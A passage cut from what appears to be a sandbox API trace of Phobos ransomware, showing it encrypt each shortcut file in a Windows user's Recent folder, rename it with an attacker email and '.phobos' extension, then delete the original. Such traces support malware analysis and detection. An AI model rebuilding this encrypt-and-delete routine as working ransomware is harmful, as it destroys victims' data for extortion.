halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\veaj0cbqm33.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.586] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.586] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.586] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x248, lpOverlapped=0x0) returned 1 [0201.588] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x250, dwBufLen=0x250 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x250) returned 1 [0201.588] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x250, lpOverlapped=0x0) returned 1 [0201.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.589] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.589] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.589] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.589] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.589] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.589] CloseHandle (hObject=0x174) returned 1 [0201.589] CloseHandle (hObject=0xfc) returned 1 [0201.589] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\veaj0CBQm33.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\veaj0cbqm33.lnk")) returned 1 [0201.590] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VplYC h.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vplyc h.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.591] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2366) returned 1 [0201.591] CloseHandle (hObject=0xfc) returned 1 [0201.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VplYC h.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vplyc h.lnk")) returned 0x20 [0201.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VplYC h.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vplyc h.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VplYC h.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vplyc h.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.592] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.592] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VplYC h.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vplyc h.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.593] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.593] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x93e, lpOverlapped=0x0) returned 1 [0201.594] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x940, dwBufLen=0x940 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x940) returned 1 [0201.594] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x940, lpOverlapped=0x0) returned 1 [0201.596] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.596] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.596] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.596] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.596] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.596] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.596] CloseHandle (hObject=0xfc) returned 1 [0201.596] CloseHandle (hObject=0x174) returned 1 [0201.596] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VplYC h.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vplyc h.lnk")) returned 1 [0201.602] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VuFT cdP3R7y8CXFbez.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vuft cdp3r7y8cxfbez.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.604] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2714) returned 1 [0201.604] CloseHandle (hObject=0x174) returned 1 [0201.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VuFT cdP3R7y8CXFbez.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vuft cdp3r7y8cxfbez.lnk")) returned 0x20 [0201.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VuFT cdP3R7y8CXFbez.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vuft cdp3r7y8cxfbez.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VuFT cdP3R7y8CXFbez.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vuft cdp3r7y8cxfbez.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.605] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.605] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VuFT cdP3R7y8CXFbez.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vuft cdp3r7y8cxfbez.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.606] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.606] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.606] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa9a, lpOverlapped=0x0) returned 1 [0201.608] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xaa0, dwBufLen=0xaa0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xaa0) returned 1 [0201.608] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xaa0, lpOverlapped=0x0) returned 1 [0201.609] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.609] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.609] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.609] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.609] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.609] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.609] CloseHandle (hObject=0x174) returned 1 [0201.609] CloseHandle (hObject=0xfc) returned 1 [0201.610] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VuFT cdP3R7y8CXFbez.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vuft cdp3r7y8cxfbez.lnk")) returned 1 [0201.611] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VYOzyWVCK.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vyozywvck.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.612] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1005) returned 1 [0201.612] CloseHandle (hObject=0xfc) returned 1 [0201.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VYOzyWVCK.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vyozywvck.lnk")) returned 0x20 [0201.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VYOzyWVCK.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vyozywvck.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VYOzyWVCK.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vyozywvck.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.612] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.612] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VYOzyWVCK.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vyozywvck.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.613] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.613] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.613] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3ed, lpOverlapped=0x0) returned 1 [0201.615] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3f0) returned 1 [0201.615] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3f0, lpOverlapped=0x0) returned 1 [0201.616] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.616] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.616] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.616] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.616] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.616] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.616] CloseHandle (hObject=0xfc) returned 1 [0201.616] CloseHandle (hObject=0x174) returned 1 [0201.616] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VYOzyWVCK.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\vyozywvck.lnk")) returned 1 [0201.617] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WfRe8W4n.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wfre8w4n.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.618] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2498) returned 1 [0201.618] CloseHandle (hObject=0x174) returned 1 [0201.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WfRe8W4n.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wfre8w4n.flv.lnk")) returned 0x20 [0201.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WfRe8W4n.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wfre8w4n.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WfRe8W4n.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wfre8w4n.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.619] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.619] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WfRe8W4n.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wfre8w4n.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.620] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.620] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.620] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x9c2, lpOverlapped=0x0) returned 1 [0201.633] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9d0, dwBufLen=0x9d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9d0) returned 1 [0201.633] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x9d0, lpOverlapped=0x0) returned 1 [0201.648] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.648] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.648] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.648] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.648] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.648] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.648] CloseHandle (hObject=0x174) returned 1 [0201.648] CloseHandle (hObject=0xfc) returned 1 [0201.648] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WfRe8W4n.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wfre8w4n.flv.lnk")) returned 1 [0201.649] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wI68lpv8Qm0zZ6.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wi68lpv8qm0zz6.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.651] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2564) returned 1 [0201.651] CloseHandle (hObject=0xfc) returned 1 [0201.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wI68lpv8Qm0zZ6.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wi68lpv8qm0zz6.flv.lnk")) returned 0x20 [0201.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wI68lpv8Qm0zZ6.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wi68lpv8qm0zz6.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wI68lpv8Qm0zZ6.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\wi68lpv8qm0zz6.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.651] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.651] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 